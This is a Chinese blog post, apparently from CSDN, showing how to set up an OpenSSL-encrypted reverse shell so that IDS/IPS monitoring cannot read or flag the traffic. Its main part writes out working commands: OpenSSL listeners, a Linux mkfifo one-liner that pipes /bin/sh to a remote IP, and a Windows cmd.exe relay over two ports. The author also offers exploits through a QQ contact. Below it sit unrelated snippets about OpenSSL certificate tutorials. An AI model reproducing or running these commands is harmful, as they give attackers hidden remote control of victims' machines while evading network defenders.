openssl命令_使用OpenSsl加密反弹shell

最新推荐文章于 2024-06-17 17:58:57 发布
最新推荐文章于 2024-06-17 17:58:57 发布
阅读量336 收藏
点赞数
文章标签: openssl命令 openssl工具 shell输入回车执行下一步 shell运行回车不出结果 windows 反弹shell windows使用openssl

一、实际环境:

当我们使用nc等工具进行反弹shell时,流量都是没经过加密,直接传输的,管理员很容易就能发现我们的异常流量,而且现在大部分企业内部都会有各种流量监测设备,所以在这种情况下当我们进行操作时,网络防御检测系统(IDS、IPS等)会获取到我们的通信内容并进行告警和阻止,因此需要对通信内容进行混淆或加密,这时可以选择使用 OpenSSL 反弹一个加密 shell。

OpenSSL 简介:

在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份

二、实验过程:

1、首先生成自签名证书,输入的时候默认回车即可:

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

d5aadff949f2fa25147ef46edac128c5.png

2、服务端监听888端口:

openssl s_server -quiet -key key.pem -cert cert.pem -port 888

0301acb6bac3d0b71789827272da73d0.png

①Linux下使用mkfifo进行反弹shell:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.136.144:888 > /tmp/s; rm /tmp/s

7287de99647e5cddddb272599e01d3f8.png

成功反弹shell:

8d5e692c3f18110ffbc9fbd2734959ab.png

②Windows下反弹shell:

1、服务端要开启两个监听,因为以上命令会从 ip:port1 获取命令发送给 cmd.exe执行,然后把结果返回到 ip:port2,因此在本机需要启动两个 s_server

openssl s_server -quiet -key key.pem -cert cert.pem -port 888
openssl s_server -quiet -key key.pem -cert cert.pem -port 887

4b05608531238735f5ce4c22f239da30.png

2、Windows下执行命令:

openssl s_client -quiet -connect 192.168.136.144:888 | cmd.exe | openssl s_client -quiet -connect 192.168.136.144:887

249938f0687da8586786801bf13fcfbe.png

在服务端的888的窗口发送命令:

6f6a93578bef2c67141a0a90d4e6def6.png

然后服务端887的窗口就能收到执行结果:

c67fb32f0b87b5f929031b5f2cfb9668.png

PS:经过测试,发送完命令后,等待好久都没结果回来,但是在windows上敲一下空格或者回车等操作,结果不一会就回来了

传输过程都是经过加密的,可以使用wireshark抓包分析一下

各位师傅可以加好友一起学习交流交个朋友,如果之前分享的exp失效了,也可以加我好友py一下:qq:1254311935

备注:公众号+师傅们的id吧

6712eecf6b5e95b28d0a8f3b400bfd5f.png

weixin_39713538
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
RSA_Encryption_Algorithm_in_a_Nut_Shell.rar_RSA openssl c++_rsa
09-23
本资源主要探讨了如何使用C++实现RSA公钥加密,并结合openssl库进行操作。下面将详细介绍RSA算法的基本原理及其C++实现的关键点。 **RSA算法概述** RSA(Rivest-Shamir-Adleman)算法是1977年由Ron Rivest、Adi ...
openssl生成https证书及nginx https配置
爱兰河少
05-31 2399
一、nginx根目录下创建 cert 目录,用于存放https证书。二、openssl生成https证书证书。三、nginx配置https。
openssl给内网IP生成ca证书(ssl证书)
wd520521的博客
03-29 6070
openssl给内网IP生成ca证书(ssl证书)
反弹shell,一篇概括
最新发布
m0_63733486的博客
06-17 54
在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。
使用 OpenSSL 创建ssl自签名证书
weixin_50218044的博客
03-30 8718
最近工作中需要创建私有化的ssl签名证书,以前使用的都是申请的免费的,没有了解过这方面的信息,经过查阅各种资料,加上数次测试,终于搞定了,一起来看看吧 什么是签名证书 自签名证书是未经公共或私有证书颁发机构签名的 SSL/TSL 证书。相反,它由创建者自己的个人或根 CA 证书签名。 这里借用一下大哥uncle的巨作,一篇文章了解数字证书 为了一个HTTPS,浏览器操碎了心 申请付费ssl证书流程 使用私钥创建证书签名请求 (CSR) 。CSR 包含有关位置、组织和 FQDN(完全限..
OpenSSL 基础命令
qq440983的博客
07-28 7995
OpenSSL功能之强大,命令组合用法之多,往往让我们的学习不知所措。在此,我们来对openssl命令使用做一个总结。
使用openssl生成证书、cer文件、key公私钥、pem公私钥
热门推荐
Solyutian的博客
11-13 3万+
penssl.key为之前生成的key的名字,openssl.cer为生成的证书名字,3650为证书过期天数,CN的参数baidu.com是的你主机名或者IP地址。openssl.key 是生成key的名称可随意。注意:生成pfx证书会提示设置密码,此密码要记住,提取密钥时要输入此密码。八、复制窗口中生成的密钥,保存为openssl_pri_pkcs8.key。七、因为RSA算法使用的是pkcs8模式补足,需要对提取的私钥进一步处理。生成cer文件、key公私钥、pem公私钥。
openssl_1_1_1-stable版本
12-19
SSH(Secure Shell)是一种网络协议,用于在不安全的网络上安全地执行远程命令和传输文件。SSH2是SSH协议的第二版,增强了安全性并修复了SSH1的一些漏洞。OpenSSL虽然主要用于SSL/TLS,但某些SSH实现可能也使用...
git-openssl-shellscript:Shellscript用OpenSSL编译git
02-03
总的来说,"git-openssl-shellscript"项目提供了一种自动化的方式来在系统中构建和安装Git,同时利用OpenSSL的强大加密功能,这在特定场景下具有很高的价值。通过学习和理解这个脚本,可以加深对Git编译过程、Shell...
cryptr:使用OpenSSL加密和解密文件的简单Shell实用程序
01-31
使用cryptr进行OpenSSL加密和解密:深入理解AES-256-CBC与Bash脚本》 在IT领域,数据安全始终是至关重要的议题。为了保护敏感信息,我们常常采用加密技术,其中OpenSSL是一个广泛使用的开源库,提供了多种加密...
openssl_update.tar.gz
09-14
本文将详细讲解"openssl_update.tar.gz"压缩包所涉及的OpenSSL升级过程及其重要性,同时也将提及与SSH(Secure Shell)的相关性。 OpenSSL是一个开源项目,为网络通信提供安全服务,包括SSL/TLS协议,以及用于各种...
OpenSSL 生成自签名证书
weixin_51715424的博客
10-19 3624
Nginx
内网使用openssl自签名证书开启https连接,同时解决chrome浏览器中的不安全访问
my_interface的博客
01-05 1万+
1、在内网中开启https访问,使用ip,请直接看第二步。如果是外网域名的话,建议直接去从 阿里云或者其他的网站中直接用权威机构颁发的证书。地址 2、请先安装OpenSSL 3、生成证书 创建根证书 新建anxinCA.cnf文件并输入以下内容: [ req ] distinguished_name = req_distinguished_name x509_extensions = root_ca [ req_distinguished_name ] # 以下内容可随意填写 .
openssl req命令
来说意义非凡3
03-05 1717
openssl req可生成请求文件及证书文件等;req [options] &lt;infile &gt;outfile where options are -inform arg input format - DER or PEM -outform arg output format - DER or PEM -in arg input file -out a...
生成自签名泛域名通配符证书,您可以使用 OpenSSL 工具
twins3520的博客
06-06 1355
在这个过程中,您需要输入一些信息,比如国家、省份、城市、组织、通用名称等。在通用名称中,您需要使用通配符来表示泛域名,比如 *.example.com。完成以上步骤后,您就可以使用生成的 domain.pem 证书文件来配置您的服务器了。要生成自签名泛域名通配符证书,您可以使用 OpenSSL 工具。在这个过程中,您可以指定证书的有效期。
openssl req(生成证书请求和自建CA)
cheems404的博客
11-26 819
openssl req(生成证书请求和自建CA) - 骏马金龙 - 博客园 (cnblogs.com)
OpenSSL-证书链
Remy的学习记录
07-28 1万+
SSL的CA证书可分为两种:Root CA(根CA证书)和Intermediate CA(中间CA证书)。其中Root CA是信任锚点,一条证书链中只能有一个。Intermediate CA可以有多个。Root CA通常不直接签发用户证书,而是签发Intermediate CA,由Intermediate CA来签发终用户书。它们之间的关系如下图所示:     证书链就是Root CA签
openssl生成私有证书并配置浏览器互信
小小人生的博客
08-23 773
1. 修改openssl.cnf # 确保req下存在以下2行(默认第一行是有的,第2行被注释了) [ req ] distinguished_name = req_distinguished_name req_extensions = v3_req # 确保req_distinguished_name下没有 0.xxx 的标签,有的话把0.xxx的0. 去掉 [ req_distinguished_name ] countryName = Country Name (2 .
openssl命令使用
weixin_34391445的博客
11-09 394
openssl openssl是个密码工具集,提供多端接口调用方式 组成: 1. 代码库 libcryto ,libssl(ssl/tls) 2. 工具openssl 对称加密 对称加密主要是用aes,des算法 需要注意的是解密不要在源文件操作,否则解密失败源文件也没有了 usage: enc -ciphername [-AadePp] [-base64] [-bu...
openssl加密后的shell脚本还能执行
07-10
是的,经过 OpenSSL 加密shell...当你使用 OpenSSL 加密一个 shell 脚本后,脚本会变成加密的二进制文件你可以使用 OpenSSL 解密该文件,后再执行解密后的脚本。请记住,解密后的脚本可能需要适当的权限才能被执行
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值